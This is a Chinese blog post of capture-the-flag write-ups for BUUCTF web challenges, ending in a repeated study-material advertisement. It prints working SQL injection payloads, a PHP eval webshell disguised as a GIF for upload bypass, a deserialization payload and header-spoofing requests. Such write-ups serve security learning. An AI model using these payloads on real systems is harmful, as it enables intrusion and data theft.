BUUCTF中 web 总结合集(正在更新中)

最新推荐文章于 2024-05-16 07:20:57 发布
最新推荐文章于 2024-05-16 07:20:57 发布
阅读量406 收藏 6
点赞数 4
分类专栏: 程序员 文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969231/article/details/138748884
版权

7、[SUCTF 2019]EasySQL注意这个不是极客,是SUCTF的EasySQL

  • 方法一:
    *,1
  • 方法二:
    1;set sql_mode=PIPES_AS_CONCAT;select 1

8、[强网杯 2019]随便注

https://cloud.tencent.com/developer/article/2352207?from_column=20421&from=20421

  • 方法一:handler命令可以一行一行的显示数据表中的内容
    1'; handler 1919810931114514open asa; handlera read next;#
  • 方法二: 编码逃逸 绕过滤
    1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
  • 方法三:利用concat拼接
    1';use supersqli;set @sql=concat('s','elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1;#
  • 方法四:改名
    1';rename table words to word2;rename table 1919810931114514 to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE words CHANGE flag data VARCHAR(100);#

改名之后,再输入1' or 1#即可查到

9、[极客大挑战 2019]LoveSQL

  • 方法一:账号中输入
    1' union select 1,2,group_concat(password) from l0ve1ysq1;#
    密码随便
  • 方法二:常规做法
  1. 爆字段看回显:1' order by 3 #正常1' order by 4#报错,说明有三个字段
  2. 爆数据库:1' union select 1,1,database();# //geek
  3. 爆表:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'# //geekuser,l0ve1ysq1
  4. 爆字段(列):1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'# //id,username,password
  5. 查看字段(列)内容:1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

10、[极客大挑战 2019]Secret File

老规矩,先F12,看到一个链接,href="./Archive_room.php",点进去跳转到Archive_room.php页面,再点击SELECT进到end.php页面,什么也没有
用burp suite拦截,看到注释里有secr3t.php,访问得到代码,进行代码审计,看懂后是php伪协议
在地址栏后面加:secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
页面中出现base64编码,放到在线网站解码即可

11、[极客大挑战 2019]Http

GET /Secret.php HTTP/1.1
Host: node5.buuoj.cn:27557

Referer: https://Sycsecret.buuoj.cn
User-Agent: Syclover
X-Forwarded-For:127.0.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

这三行改成要求即可,如图,右面会显示flag

12、[极客大挑战 2019]Knife

下载后在空白处点击右键,添加数据

因为网站本来就是一个shell的执行页面,所以不用连接文件,直接粘贴过来网址就行,然后密码根据网页提示是Syc,测试连接,成功后再点添加数据,最上面的这条就是

双击点进去,去根目录下找flag,因为一般flag都在根目录下

13、[极客大挑战 2019]Upload

这些文件上传类型的题,假如说中间有步骤做错了,或者上传了多个文件,用蚁剑连不上,那你就销毁靶机,等一会重新启动,一次性做对,再连接就好了。包括上面那些用burp suite 修改参数的也是,重新启动环境即可

一句话木马:

GIF89a
<script language="php">@eval($_POST['pass']);</script>

新建一个 1.txt 文档,里面写上面的一句话木马,然后把后缀改成.phtml
GIF89a是16进制的GIF 用于绕过文件检测,POST['']里面是连接的密码,post请求就用post连接

在burp suite中把Content-Type改为 image/jpeg

然后点提交

尝试访问upload目录,可以看到上传成功

然后用蚁剑连接,网页路径后加/upload/1.phtml,密码是 pass

去根目录下找即可

14、[ACTF2020 新生赛]Upload

第一步:上传上面那个 1.phtml 文件,提示只能上传jpg、png、gif

那就把上面的 1.phtml 改成 1.jpg上传,注意我这里在里面改了密码 guoli

然后在bp里把 1.jpg 再改成 1.phtml,然后左上角点发送

可以看到上传成功

把后面的地址放到后面,用蚁剑连接,成功了点添加

然后在第一个点进去,去根目录找即可

15、[极客大挑战 2019]BabySQL

这是前两个的升级,采用双写绕过
测试回显:
账号: 1' ununionion seselectlect 1,2,3#

密码随便,回显正常

1' ununionion seselectlect 1,2,3,4#就报错,所以有三个字段

后续与[极客大挑战 2019]LoveSQL原理一致,用双写绕过即可, 可以看到下面这些都被过滤了

爆当前库名: 1'ununionion seselectlect 1,2,database()# // geek

爆所有库名: 1'ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

//六个库 information_schema, mysql, performance_schema, test, ctf, geek

爆ctf库的表名: 1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

爆字段名:1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#

查看字段内容(因为flag不在当前数据库,所以用ctf.Flag):1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag #

16、[极客大挑战 2019]PHP

又是这个猫猫

在地址栏后面输入: ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}即可得到falg

具体做法:

网页提示了有备份,猜测组合出是www.zip

常见的网站源码备份文件后缀:
.tar.gz, .zip, .rar, .tar,.php.bak, .swp, 

常见的网站源码备份文件名:
web, website, backup, back, www, wwwroot, temp

猜一下组合尝试就好,或者在kali中,用dirsearch扫描常见备份后缀文件

dirsearch -u http://dae1596f-6683-41e4-8506-e4566bca64af.node5.buuoj.cn:81/ | grep -E '\.zip|\.tar\.gz|\.rar|\.php\.bak'

时间有点长,还不如猜的组合快,然后观察,其他都是500多B,只有这个是6KB,大概率是这个

在网址后面加上www.zip下载,打开如图:

打开flag,啥也不是

打开class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

代码审计,大概意思就是,如果
username= 'admine' 和 password = '100'
才会输出flag

访问index.php

unserialize():

unserialize — 从已存储的表示中创建 PHP 的值列化后的字符串。
若被反序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wakeup()成员函数(如果存在的话)

参考:https://blog.csdn.net/qq_43622442/article/details/105623384

在这里,我们可以将 php 代码 以文本的方式显示

<?php
class Name{
    private $username = 'admine';
    private $password = '100';
    }
 $select = new Name();
 $res=serialize(@$select);   
 echo $res
?>

在php中运行上面代码,没有环境也可以用在线网站

结果是:O:4:"Name":2:{s:14:"Nameusername";s:6:"admine";s:14:"Namepassword";s:3:"100";}

当成员属性数目大于实际数目时才可绕过wakeup

所以我们要将 2 改为 3 或者 比二大的数字

同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少空格,然后就ok

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

17、[ACTF2020 新生赛]BackupFile

在地址栏后面加:

index.php.bak

下载下来打开和上题一样是代码审计

在地址栏后面加:

?key=123
即可得到flag

具体做法:

和上一题一样,因为标题说是BackupFile,即备份文件,所以用组合尝试,或者kali中用dirsearch扫描常见备份后缀文件

dirsearch -u http://94f3591a-a175-4d4c-978d-56ee5c6a0995.node5.buuoj.cn:81/ | grep -E '\.zip|\.tar\.gz|\.rar|\.php\.bak'

我参考了别的大佬的wp,知道了是index.php.bak,但是我扫出来文件大小和别的大小都是一样的,我也不知道他们是怎么看出来的,感觉还得是尝试组合

剩下就是,下载好打开文件,代码审计,看懂后,再地址栏后面加?key=123即可

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

[外链图片转存中…(img-PZPvrUIn-1715482272561)]

[外链图片转存中…(img-078PoRyv-1715482272562)]

[外链图片转存中…(img-oCqkjRlE-1715482272562)]

[外链图片转存中…(img-xgPQ7QQA-1715482272562)]

[外链图片转存中…(img-B2nUWjfW-1715482272563)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84969231
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
buuctf(web)部分实操题和知识点
Z11762的博客
04-18 772
这里跟前面做过的一个看后端源码的题很相似,就是:PHP的文件包含函数有一个「特性」,被包含的文件内容,如果是「代码」则会执行,而不会在页面展示;针对这一特性,我们可以使用PHP伪协议对文件内容进行「编码」,编码后的文件内容由于不能被执行,会展示在页面,而后再将页面的内容复制到本地进行「解码」,即可查看文件内容,拿到 flag。"https://Sycsecret.buuoj.cn" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。之后界面显示“No!
【CTF】buuctf web 详解(持续更新
热门推荐
m0_52923241的博客
08-12 4万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84247617的博客
05-16 1016
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6291
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4447
BUUCTF--Web篇详细wp。
BUUCTF(web刷题记录一)
nareku的博客
04-16 8712
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5209
BUUCTFWeb题解
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
`extract()`函数会从数组提取键作为变量名,并将对应的值赋给这些变量。如果不小心使用了未经过滤的用户输入数据作为此函数的源数组,攻击者可以指定恶意的键值对,覆盖原本的变量。 3. **parse_str()函数使用...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF之MISC(持续更新
12-21
kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用...
BUUCTF逆向前八题
01-24
在本篇,我们将探讨在BUUCTF储备赛遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2495
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
BUUCTF web 系列详解 (详细版)持续更新
llki666的博客
12-27 1898
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其的问号位置之前的子串。
BUUCTF_MISC题解
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
BUUCTF——Web
2201_75331136的博客
07-11 956
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF Web】WriteUp超详细
qq_62604985的博客
07-10 1918
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
BUUCTF】Misc题解
xuanyulevel6的博客
07-31 1万+
BUUCTF-Misc题解
BUUCTF——Basic
计算机硕士的博客
06-16 1668
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛的一个web题目。其可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值